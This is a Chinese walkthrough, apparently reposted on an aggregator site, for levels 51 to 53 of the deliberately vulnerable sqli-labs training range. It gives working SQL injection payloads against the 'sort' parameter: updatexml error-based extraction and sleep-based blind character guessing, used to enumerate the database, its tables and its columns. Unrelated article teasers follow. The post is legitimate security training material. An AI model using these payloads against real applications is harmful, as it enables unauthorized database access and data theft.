sqli-labs靶场通关攻略(51-60)

news2024/11/15 4:35:26

Less-51

1、判断闭合方式

输入?sort=1' --+  页面闭合成功
  2、查询数据库

输入?sort=-1' and updatexml(1,concat(1,database()),1) --+

3、查询数据库中的表

输入?sort=-1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1) --+

4、查询users表中的列

输入?sort=-1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

Less-52

1、判断闭合方式

输入?sort=1 --+ ,页面闭合成功

2、查询数据库长度

输入?sort=1 and if(length(database())>7,sleep(3),1) --+  页面延时三秒

输入?sort=1 and if(length(database())>8,sleep(3),1) --+ 页面回显正常

得出数据库长度为8

3、查询数据库名

输入?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1),页面延时三秒

输入?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1) 页面回显正常

得出第一位字符的ASCII值为115,结合ASCII表得出的一个字符为‘s’

再依次类推得出数据库名为‘security’

4、查询数据库中的表

输入?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)  页面延时三秒

输入?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)    页面回显正常

得出表的第一个字符的ascii值为101,结合ASCII表得出第一个字符为‘e’

再依次类推,得出第一个数据库为‘email’

Less-53

1、判断闭合方式

输入?sort=1' --+  页面闭合成功

2、查询数据库名

输入?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

 页面延时三秒

输入?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

 页面正常回显

说明第一个字符大于114不大于115 即第一位字符ascii码等于115

结合ASCII表得出的一个字符为‘s’

再依次类推,得出数据库名为‘security’

3、查询数据库中的表

输入?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+ 

页面延时三秒

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2090452.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

北京青蓝智慧科技2024数博会:共谋数字经济新篇章

北京青蓝智慧科技2024数博会:共谋数字经济新篇章

在数字化的浪潮下,大数据企业如雨后春笋般涌现,而应用场景更是无处不在。 伴随着“数博十年”的盛约,新老朋友纷纷涌向贵阳国际会议展览中心,于8月28-30日共襄盛举。 2024中国国际大数据产业博览会(简称“数博会”&a…
阅读更多...
Django国际化和本地化

Django国际化和本地化

【图书介绍】《Django 5企业级Web应用开发实战(视频教学版)》_django 5企业级web应用开发实战(视频教学版)-CSDN博客 《Django 5企业级Web应用开发实战(视频教学版)》(王金柱)【摘要 书评 试读】- 京东图书 (jd.com) 本节主要介…
阅读更多...
一个最基本的多线程3D渲染器方案

一个最基本的多线程3D渲染器方案

概括 渲染器仍然是大多数现代视频游戏的主要组件。通常,这些流水线通过 3D 图形应用程序接口(如 DirectX、OpenGL )暴露出来。现代,多核 CPU 已广泛应用于游戏机和个人电脑。为了确保 GPU 能持续不断地处理数据,渲染器…
阅读更多...
惠中科技RDS自清洁膜层:光伏行业的清洁革命与创新先锋

惠中科技RDS自清洁膜层:光伏行业的清洁革命与创新先锋

在当今全球能源转型和光伏产业蓬勃发展的背景下,光伏电站的运营维护面临着诸多挑战,其中灰尘污染问题尤为突出。灰尘的堆积不仅降低了光伏板的透光率,还直接影响了电站的发电效率和经济效益。为了有效解决这一难题,惠中科技凭借其…
阅读更多...
C++日期差值问题(2个日期之间差几天)

C++日期差值问题(2个日期之间差几天)

上面是牛客网给出的题目。 思路 假设第一个输入的日期为2011 12 03,第二个输入的日期为2024 02 29。 这两个日期并不相等,我们可以让日期2011 12 03一直加1,直到等于2024 02 29为止。 在这个过程中,每1一次,就让re…
阅读更多...
情感共鸣:数业智能心大陆重塑AI心理交互新纪元

情感共鸣:数业智能心大陆重塑AI心理交互新纪元

在科技蓬勃发展的今天,人工智能如同一张大网,与我们的生活密切交织,在多个层面深刻影响着每一个人。而数业智能心大陆,作为 “AI 心理健康” 领域的佼佼者,正以其独特的技术和创新理念, 为人工智能与用户的…
阅读更多...
企业EMS - 能源管理系统 - 能源管理系统源码-能源在线监测平台-双碳平台源码

企业EMS - 能源管理系统 - 能源管理系统源码-能源在线监测平台-双碳平台源码

一、介绍 企业EMS - 能源管理系统 - 能源管理系统源码-能源在线监测平台-双碳平台源码’ 二、软件架构 二、功能介绍 三、数字大屏展示 四、数据采集原理 五、软件截图
阅读更多...
C++ 有向图算法

C++ 有向图算法

概念 Breadth-First Search (BFS) 目的: 主要用于遍历或搜索图中的所有顶点。 特点: 从根节点开始,先访问所有与之相邻的节点,然后再一层一层地深入。 应用: 可以用来寻找两节点间的最短路径(当边的权重相等时),检测…
阅读更多...
笔记:应用Visual Studio Profiler分析CPU使用情况

笔记:应用Visual Studio Profiler分析CPU使用情况

一、目的:应用Visual Studio Profiler分析CPU使用情况 使用 Visual Studio Profiler 分析 CPU 使用情况可以帮助你识别性能瓶颈,优化代码,提高应用程序的响应速度。 二、实现 以下是如何使用 Visual Studio Profiler 分析 CPU 使用情况的详…
阅读更多...
前端问答:如何判断变量是否为数组?

前端问答:如何判断变量是否为数组?

在JavaScript的世界里,判断一个变量的类型是开发者日常工作中不可或缺的一部分,尤其是在处理数组这种关键数据结构时。数组作为一种广泛应用于各种操作的数据结构,无论是简单的数据存储还是复杂的算法实现,都发挥着重要作用。然而…
阅读更多...
力扣刷题--762. 二进制表示中质数个计算置位【简单】

力扣刷题--762. 二进制表示中质数个计算置位【简单】

题目描述🍗 给你两个整数 left 和 right ,在闭区间 [left, right] 范围内,统计并返回 计算置位位数为质数 的整数个数。 计算置位位数 就是二进制表示中 1 的个数。 例如, 21 的二进制表示 10101 有 3 个计算置位。 示例 1&am…
阅读更多...
【JPCS独立出版】2024电驱系统与控制工程国际学术研讨会(EDSCE 2024,10月18-20)

【JPCS独立出版】2024电驱系统与控制工程国际学术研讨会(EDSCE 2024,10月18-20)

2024电驱系统与控制工程国际学术研讨会(EDSCE 2024)将于2024年10月18-20日在中国本溪隆重举行。 本次会议将集中讨论电驱系统与控制工程的最新研究成果,旨在建立一个高水平的学术交流平台,以便领域内的专家学者、工程师和技术研发…
阅读更多...
【单片机原理及应用】实验: 8位数码显示器

【单片机原理及应用】实验: 8位数码显示器

目录 一、实验目的 二、实验内容 三、实验步骤 四、记录与处理 五、思考 六、成果文件提取链接 一、实验目的 学习8位数码管串行扩展原理,掌握74HC595与动态显示编程方法。 二、实验内容 【参照图表】 (1)创建一个包含80C51固件&#x…
阅读更多...
如何选择适合企业的财税自动化解决方案

如何选择适合企业的财税自动化解决方案

财税自动化解决方案是现代企业提升财务管理效率、降低运营成本的关键工具。然而,市场上的财税自动化产品琳琅满目,功能各异,企业在选择时常常感到困惑。本文金智维将从中小型的需求出发,帮助企业了解如何选择适合自身的财税自动化…
阅读更多...
ASP.NET Core6.0-wwwroot文件夹无法访问解决方法

ASP.NET Core6.0-wwwroot文件夹无法访问解决方法

默认情况下,ASP.NET Core项目中的wwwroot文件夹被视为Web根文件夹。静态文件可以存储在Web根目录下的任何文件夹中,并可以使用该根目录的相对路径进行访问。在ASP.NET应用程序中,可以从应用程序的根文件夹或其下的任何其他文件夹提供静态文件…
阅读更多...
数据分析学习之numpy

数据分析学习之numpy

引言 好久没写帖子了,确实变懒了,在这一个月里学习了爬虫,还有seleium自动化技术初步以及数据分析中的numpy,下一步就要学习pandas,但是欠了太多帖子没写,所以现在来补一下,现在来的是numpy的学习&#xff…
阅读更多...
Java面试宝典-java基础07

Java面试宝典-java基础07

Java面试宝典-java基础07 61、什么是 java 序列化?什么情况下需要序列化?62、序列化使用场景有哪些?63、使用序列化和反序列化的注意事项64、为什么要使用克隆?如何实现对象克隆?深拷贝和浅拷贝区别是什么?…
阅读更多...
计算机网络概述(分组延时、丢失和吞吐量)

计算机网络概述(分组延时、丢失和吞吐量)

目录 分组丢失和延时是怎样发生的? 四种分组延时 节点延时 排队延迟 分组丢失 吞吐量 吞吐量:互联网场景 分组丢失和延时是怎样发生的? 在路由器缓冲区的分组队列 分组到达链路的速率超过了链路输出的能力分组等待排队到队头、被传输…
阅读更多...
Ethernet 测试系列(1)-- 物理层测试::IOP Test::Link-up time

Ethernet 测试系列(1)-- 物理层测试::IOP Test::Link-up time

车载以太网物理层IOP测试,即互操作性测试(Interop- erability Tests),用于验证车载以太网PHY(通常也称为收发器)的可靠性和检查PHY能否在给定的有限时间内建立稳定的链路;还用于车载以太网PHY的诊断&#x…
阅读更多...
ARCGIS 纸质小班XY坐标转电子要素面(2)

ARCGIS 纸质小班XY坐标转电子要素面(2)

本章用于说明未知坐标系情况下如何正确将XY转要素面 背景说明 现有资料:清除大概位置,纸质小班图,图上有横纵坐标,并已知小班XY拐点坐标,但未知坐标系。需要上图 具体操作 大部分操作同这边文章ARCGIS 纸质小班XY…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023